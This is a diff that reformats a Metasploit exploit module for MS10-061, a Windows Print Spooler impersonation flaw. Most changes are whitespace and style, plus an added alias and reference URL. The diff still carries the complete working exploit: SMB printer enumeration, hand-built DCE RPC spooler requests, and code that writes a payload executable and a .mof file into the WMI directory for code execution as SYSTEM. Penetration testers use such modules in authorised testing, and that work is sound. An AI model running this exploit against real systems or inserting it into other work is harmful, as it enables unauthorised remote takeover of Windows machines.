@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -13,66 +12,67 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::WbemExec
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability',
+        'Description' => %q{
           This module exploits the RPC service impersonation vulnerability detailed in
-        Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the
-        StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service
-        to create a file. The working directory at the time is %SystemRoot%\\system32.
-        An attacker can specify any file name, including directory traversal or full paths.
-        By sending WritePrinter requests, an attacker can fully control the content of
-        the created file.
+          Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the
+          StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service
+          to create a file. The working directory at the time is %SystemRoot%\system32.
+          An attacker can specify any file name, including directory traversal or full paths.
+          By sending WritePrinter requests, an attacker can fully control the content of
+          the created file.
 
-        In order to gain code execution, this module writes to a directory used by Windows
-        Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)
-        is periodically scanned and any new .mof files are processed automatically. This is
-        the same technique employed by the Stuxnet code found in the wild.
-      },
-      'Author'         =>
-        [
-          'jduck',  # re-discovery, printer RPC stubs, module
-          'hdm'     # ATSVC RPC proxy method, etc ;)
+          In order to gain code execution, this module writes to a directory used by Windows
+          Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof)
+          is periodically scanned and any new .mof files are processed automatically. This is
+          the same technique employed by the Stuxnet code found in the wild.
+        },
+        'Author' => [
+          'jduck', # re-discovery, printer RPC stubs, module
+          'hdm' # ATSVC RPC proxy method, etc ;)
         ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'win',
-      'Notes' => {
-        'Stability' => [Msf::CRASH_SAFE],
-        'SideEffects' => [Msf::ARTIFACTS_ON_DISK],
-        'Reliability' => []
-      },
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Notes' => {
+          'AKA' => ['EMERALTHREAD'],
+          'Stability' => [Msf::CRASH_SAFE],
+          'SideEffects' => [Msf::ARTIFACTS_ON_DISK],
+          'Reliability' => []
+        },
+        'References' => [
           [ 'OSVDB', '67988' ],
           [ 'CVE', '2010-2729' ],
-          [ 'MSB', 'MS10-061' ]
+          [ 'MSB', 'MS10-061' ],
+          [ 'URL', 'https://www.tenable.com/plugins/nessus/49219']
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 1024,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 1024,
           'BadChars' => "",
           'DisableNops' => true,
         },
-      'Targets'        =>
-        [
-          [ 'Windows Universal', { } ]
+        'Targets' => [
+          [ 'Windows Universal', {} ]
         ],
-      'DisclosureDate' => '2010-09-14',
-      'DefaultTarget' => 0))
+        'DisclosureDate' => '2010-09-14',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
-        OptString.new('SMBPIPE', [ false,  "The named pipe for the spooler service", "spoolss"]),
-        OptString.new('PNAME',   [ false,  "The printer share name to use on the target" ]),
-      ])
+        OptString.new('SMBPIPE', [ false, "The named pipe for the spooler service", "spoolss"]),
+        OptString.new('PNAME', [ false, "The printer share name to use on the target" ]),
+      ]
+    )
 
     deregister_options('SMB::ProtocolVersion')
   end
 
-
   def exploit
-
     connect(versions: [1])
     login_time = Time.now
     smb_login()
@@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
         "\\PIPE\\LANMAN",
         (
           [0x00].pack('v') +
-          "WrLeh\x00"   +
-          "B13BWz\x00"  +
+          "WrLeh\x00" +
+          "B13BWz\x00" +
           [0x01, 65406].pack("vv")
         )
       )
@@ -114,13 +114,13 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
 
       0.upto(lentries - 1) do |i|
-        sname,tmp = data[(i * 20) +  0, 14].split("\x00")
-        stype     = data[(i * 20) + 14, 2].unpack('v')[0]
-        scoff     = data[(i * 20) + 16, 2].unpack('v')[0]
-        if ( lconv != 0)
+        sname, tmp = data[(i * 20) + 0, 14].split("\x00")
+        stype = data[(i * 20) + 14, 2].unpack('v')[0]
+        scoff = data[(i * 20) + 16, 2].unpack('v')[0]
+        if (lconv != 0)
           scoff -= lconv
         end
-        scomm,tmp = data[scoff, data.length - scoff].split("\x00")
+        scomm, tmp = data[scoff, data.length - scoff].split("\x00")
 
         # we only want printers
         next if stype != 1
@@ -133,19 +133,17 @@ class MetasploitModule < Msf::Exploit::Remote
     exe = generate_payload_exe
 
     printers.each { |pr|
-
       pname = "\\\\#{rhost}\\#{pr}"
 
       print_status("Attempting to exploit MS10-061 via #{pname} ...")
 
       # Open the printer
-      status,ph = open_printer_ex(pname)
+      status, ph = open_printer_ex(pname)
       if status != 0
         fail_with(Failure::Unknown, "Unable to open printer: #{Msf::WindowsError.description(status)}")
       end
       print_status("Printer handle: %s" % ph.unpack('H*'))
 
-
       # NOTE: fname can be anything nice to write to (cwd is system32), even
       # directory traversal and full paths are OK.
       fname = rand_text_alphanumeric(14) + ".exe"
@@ -158,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
       write_file_contents(ph, "wbem\\mof\\#{mofname}", mof)
 
       # ClosePrinter
-      status,ph = close_printer(ph)
+      status, ph = close_printer(ph)
       if status != 0
         fail_with(Failure::Unknown, "Failed to close printer: #{Msf::WindowsError.description(status)}")
       end
@@ -176,28 +174,25 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     disconnect
-
   rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError
     fail_with(Failure::Unknown, $!.message)
   end
 
-
   #
   # Use the vuln to write a file :)
   #
   def write_file_contents(ph, fname, data)
-
-    doc = rand_text_alphanumeric(16+rand(16))
+    doc = rand_text_alphanumeric(16 + rand(16))
 
     # StartDocPrinter
-    status,jobid = start_doc_printer(ph, doc, fname)
+    status, jobid = start_doc_printer(ph, doc, fname)
     if status != 0 or jobid < 0
       fail_with(Failure::Unknown, "Unable to start print job: #{Msf::WindowsError.description(status)}")
     end
     print_status("Job started: 0x%x" % jobid)
 
     # WritePrinter
-    status,wrote = write_printer(ph, data)
+    status, wrote = write_printer(ph, data)
     if status != 0 or wrote != data.length
       fail_with(Failure::Unknown, ('Failed to write %d bytes!' % data.length))
     end
@@ -210,7 +205,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   #
   # Call RpcOpenPrinterEx
   #
@@ -239,9 +233,9 @@ class MetasploitModule < Msf::Exploit::Remote
     user = NDR.uwstring(user)
 
     splclient_info =
-      NDR.long(0) +          # DWORD dwSize;
-      machine[0,4] +         # [string] wchar_t* pMachineName;
-      user[0,4] +            # [string] wchar_t* pUserName;
+      NDR.long(0) + # DWORD dwSize;
+      machine[0, 4] +         # [string] wchar_t* pMachineName;
+      user[0, 4] +            # [string] wchar_t* pUserName;
       NDR.long(7600) +       # DWORD dwBuildNum
       NDR.long(3) +          # DWORD dwMajorVersion;
       NDR.long(0) +          # DWORD dwMinorVersion;
@@ -251,16 +245,16 @@ class MetasploitModule < Msf::Exploit::Remote
     splclient_info << machine[4, machine.length]
     splclient_info << user[4, user.length]
 
-    splclient_info[0,4] = NDR.long(splclient_info.length)
+    splclient_info[0, 4] = NDR.long(splclient_info.length)
 
     splclient_info =
       # union!
-      NDR.long(1) +        # discriminant (inside copy)
+      NDR.long(1) + # discriminant (inside copy)
       NDR.long(rand(0xffffffff)) +
       splclient_info
 
     stubdata =
-      NDR.uwstring(pname) +  # pPrinterName
+      NDR.uwstring(pname) + # pPrinterName
       NDR.long(0) +
       # DEVMODE_CONTAINER (null)
       NDR.long(0) +
@@ -272,13 +266,13 @@ class MetasploitModule < Msf::Exploit::Remote
       # SPLCLIENT_INFO_1
       splclient_info
 
-    #print_status('Sending OpenPrinterEx request...')
+    # print_status('Sending OpenPrinterEx request...')
     response = dcerpc.call(69, stubdata)
     if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-      #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
+      # print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
 
-      handle = dcerpc.last_response.stub_data[0,20]
-      status = dcerpc.last_response.stub_data[20,4].unpack('V').first
+      handle = dcerpc.last_response.stub_data[0, 20]
+      status = dcerpc.last_response.stub_data[20, 4].unpack('V').first
 
       return [status, handle]
     end
@@ -286,7 +280,6 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
-
   #
   # Call RpcStartDocPrinter
   #
@@ -338,10 +331,10 @@ class MetasploitModule < Msf::Exploit::Remote
       NDR.long(1) +
       doc_info
 
-    #print_status('Sending StartDocPrinter request...')
+    # print_status('Sending StartDocPrinter request...')
     response = dcerpc.call(17, stubdata)
     if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-      #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
+      # print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
       jobid, status = dcerpc.last_response.stub_data.unpack('VV')
       return [status, jobid]
     end
@@ -349,7 +342,6 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
-
   #
   # Call RpcWritePrinter
   #
@@ -370,18 +362,17 @@ class MetasploitModule < Msf::Exploit::Remote
       NDR.align(data) +
       NDR.long(data.length)
 
-    #print_status('Sending WritePrinter request...')
+    # print_status('Sending WritePrinter request...')
     response = dcerpc.call(19, stubdata)
     if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-      #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
-      wrote,status = dcerpc.last_response.stub_data.unpack('VV')
+      # print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
+      wrote, status = dcerpc.last_response.stub_data.unpack('VV')
       return [status, wrote]
     end
 
     nil
   end
 
-
   #
   # Call RpcEndDocPrinter
   #
@@ -392,18 +383,17 @@ class MetasploitModule < Msf::Exploit::Remote
     );
 =end
 
-    #print_status('Sending EndDocPrinter request...')
+    # print_status('Sending EndDocPrinter request...')
     response = dcerpc.call(23, handle)
     if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-      #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
-      status = dcerpc.last_response.stub_data[0,4].unpack('V').first
+      # print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
+      status = dcerpc.last_response.stub_data[0, 4].unpack('V').first
       return status
     end
 
     nil
   end
 
-
   #
   # Call RpcClosePrinter
   #
@@ -414,25 +404,24 @@ class MetasploitModule < Msf::Exploit::Remote
     );
 =end
 
-    #print_status('Sending ClosePrinter request...')
+    # print_status('Sending ClosePrinter request...')
     response = dcerpc.call(29, handle)
     if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-      #print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
-      handle = dcerpc.last_response.stub_data[0,20]
-      status = dcerpc.last_response.stub_data[20,4].unpack('V').first
-      return [status,handle]
+      # print_status("\n" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))
+      handle = dcerpc.last_response.stub_data[0, 20]
+      status = dcerpc.last_response.stub_data[20, 4].unpack('V').first
+      return [status, handle]
     end
 
     nil
   end
 
-
   def seconds_since_midnight(time)
     # .tv_sec always uses .utc
     (time.tv_sec % 86400)
 
     # This method uses the localtime
-    #(time.hour * 3600) + (time.min * 60) + (time.sec)
+    # (time.hour * 3600) + (time.min * 60) + (time.sec)
   end
 
   # We have to wait a bit longer since the WMI service is a bit slow..
